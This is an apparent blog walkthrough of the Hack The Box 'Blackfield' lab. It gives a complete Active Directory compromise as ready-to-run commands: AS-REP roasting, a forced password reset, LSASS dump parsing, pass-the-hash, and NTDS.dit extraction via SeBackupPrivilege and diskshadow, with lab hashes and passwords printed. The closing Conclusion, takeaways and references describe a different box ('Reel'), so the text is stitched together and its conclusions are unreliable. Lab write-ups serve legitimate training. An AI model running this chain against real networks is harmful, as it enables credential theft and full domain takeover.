Blackfield | Hack The Box Walkthrough | OSCP Style

When tackling Active Directory environments, the path to Domain Admin rarely relies on a single exploit. Instead, it’s a chain of…

When tackling Active Directory environments, the path to Domain Admin rarely relies on a single exploit. Instead, it’s a chain of misconfigurations, excessive privileges, and forensic artifacts. In this writeup, we will walk through the compromise of the Blackfield machine from Hack The Box. We’ll cover enumeration, AS-REP Roasting, abusing ForceChangePassword via RPC, extracting credentials from memory dumps, and finally, exploiting SeBackupPrivilege to extract the NTDS.dit database.

Let’s dive into the technical step-by-step.

Reconnaissance

As with any engagement, we begin with a comprehensive port scan to map the attack surface.

sudo nmap -p- --open -sS -sV -sC --min-rate 5000 -vvv -n 10.10.10.192 -oN result.txt

The results reveal a standard Domain Controller profile: DNS (53), Kerberos (88), RPC (135), SMB (139/445), and LDAP (389/3268).

Our next logical step is to enumerate SMB shares. Using a dummy username, we check for null session or guest access:

smbmap -H 10.10.10.192 -u 'dfdsfsdf'

We discover read access to the profiles$ share. Let's inspect it

smbclient //10.10.10.192/profiles$ -N

smbmap -H 10.10.10.192 -u 'dfdsfsdf' -r 'profiles
#x27;

This share contains a goldmine for enumeration: a directory listing of domain users. We can parse this output to generate a valid user list for the domain BLACKFIELD.local:

smbmap -H 10.10.10.192 -u 'dfdsfsdf' -r 'profiles
#x27; | awk 'NF{print $NF}' > users.txt

With a user list in hand, we validate the accounts against Kerberos using kerbrute:

./kerbrute userenum -d BLACKFIELD.local --dc 10.10.10.192 users.txt

Now that we have confirmed valid users, we can check for accounts that do not require Kerberos pre-authentication, making them vulnerable to AS-REP Roasting:

impacket-GetNPUsers BLACKFIELD.local/ -no-pass -usersfile valid-users.txt

We successfully retrieve an AS-REP hash for the support user. We crack it using Hashcat:

hashcat -a 0 -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force

Credentials obtained: support : #00^BlackKnight

Enumeration & Lateral Movement

With valid domain credentials, we validate our access across the network:

crackmapexec smb 10.10.10.192 -u 'support' -p '#00^BlackKnight'

smbmap -H 10.10.10.192 -u 'support' -p '#00^BlackKnight'

To understand the domain architecture and map potential privilege escalation vectors, we extract domain data using ldapdomaindump and BloodHound:

ldapdomaindump -u 'BLACKFIELD.local\support' -p '#00^BlackKnight' 10.10.10.192

bloodhound-python -c all -u 'support' -p '#00^BlackKnight' -ns 10.10.10.192 -d BLACKFIELD.local

Analyzing the data in BloodHound reveals a critical misconfiguration: the support user has ForceChangePassword rights over the audit2020 account.

Since we don’t have interactive access yet, we can abuse this right over RPC to reset audit2020's password:

net rpc
net rpc password audit2020 -U 'support' -S 10.10.10.192

We verify our new access for audit2020:

crackmapexec smb 10.10.10.192 -u 'audit2020' -p '#00^BlackKnight'

Forensic Artifacts and Memory Analysis

Enumerating the shares as audit2020 reveals a new accessible share: forensic.

smbmap -H 10.10.10.192 -u 'audit2020' -p '#00^BlackKnight'

smbmap -H 10.10.10.192 -u 'audit2020' -p '#00^BlackKnight' -r 'forensic'
smbmap -H 10.10.10.192 -u 'audit2020' -p '#00^BlackKnight' -r 'forensic/memory_analysis'

Inside forensic/memory_analysis, we find a memory dump of the LSASS process (lsass.zip). We download it to our local machine for offline analysis.

smbmap -H 10.10.10.192 -u 'audit2020' -p '#00^BlackKnight' --download 'forensic/memory_analysis/lsass.zip'

LSASS (Local Security Authority Subsystem Service) memory dumps often contain plain-text passwords or NTLM hashes of users who have recently authenticated. We can parse it offline using pypykatz:

pypykatz lsa minidump lsass.DMP

We successfully extract the NTLM hash for the svc_backup user: 9658d1d1dcd9250115e2205d9f48400d.

We use Pass-the-Hash (PtH) to authenticate via WinRM as svc_backup:

crackmapexec winrm 10.10.10.192 -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'
evil-winrm -i 10.10.10.192 -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'

Privilege Escalation

Checking our privileges as svc_backup, we see we have SeBackupPrivilege.

whoami /priv

This privilege allows a user to read any file on the system, bypassing ACLs, intended for backup operations. This means we can extract sensitive files like C:\Windows\System32\config\SYSTEM and the NTDS.dit (the Active Directory database containing all domain hashes).

Since NTDS.dit is constantly in use by the system, we cannot simply copy it. We must create a Volume Shadow Copy. First, we save the SYSTEM hive:

reg save HKLM\system system

Next, we create a script (diskshadow.txt) to utilize diskshadow.exe. (Note: Ensure a blank space is at the end of every line to prevent parsing errors).

set context persistent nowriters
add volume c: alias crypto
create
expose %crypto% z:

We execute diskshadow using our script to mount the shadow copy to the Z: drive:

diskshadow.exe /s C:\Temp\diskshadow.txt

dir z:

With the shadow copy mounted, we use robocopy with the /b flag (Backup mode, which leverages SeBackupPrivilege) to copy the NTDS.dit file out of the shadow volume:

robocopy /b z:\Windows\NTDS\ . ntds.dit

We download both the SYSTEM hive and ntds.dit to our attacker machine via evil-winrm:

download ntds.dit

Finally, we parse the NTDS database locally to dump all domain hashes using Impacket’s secretsdump:

impacket-secretsdump -system system -ntds ntds.dit LOCAL

With the Domain Admin (Administrator) hash in hand, we establish our final WinRM session:

evil-winrm -i 10.10.10.192 -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee'

Conclusion

Reel is a fantastic, realistic box. The foothold mirrors how real intrusions often begin, not with a service exploit, but with OSINT and a user opening the wrong document. The rest is a masterclass in Active Directory ACL abuse: a single misplaced WriteOwner let us pivot to another user, a password reset gave us their session, and a WriteDacl on a privileged group carried us to the administrator’s secrets. Each permission looked harmless in isolation; chained together, they meant full domain compromise.

Key takeaways:

  • Strip metadata from documents before publishing: author fields leak valid identities.
  • SMTP services that confirm valid recipients enable user enumeration; restrict VRFY/RCPT behaviour.
  • Keep Office clients patched; client-side document attacks remain a top intrusion vector.
  • Audit Active Directory ACLs. Dangerous edges like WriteOwner and WriteDacl chain into full compromise: review them with BloodHound.
  • Never store credentials in backup scripts; group membership often grants more access than intended.

References

  • Abusing Active Directory ACLs/ACEs: The Hacker Recipes
  • Microsoft Security Advisory: CVE-2017–0199
  • PowerView Documentation
  • PentestLab: DiskShadow

If you’re interested in following my upcoming articles on OT/ICS, certifications, HTB content, and Red Team experiences, I invite you to connect with me on LinkedIn or Instagram.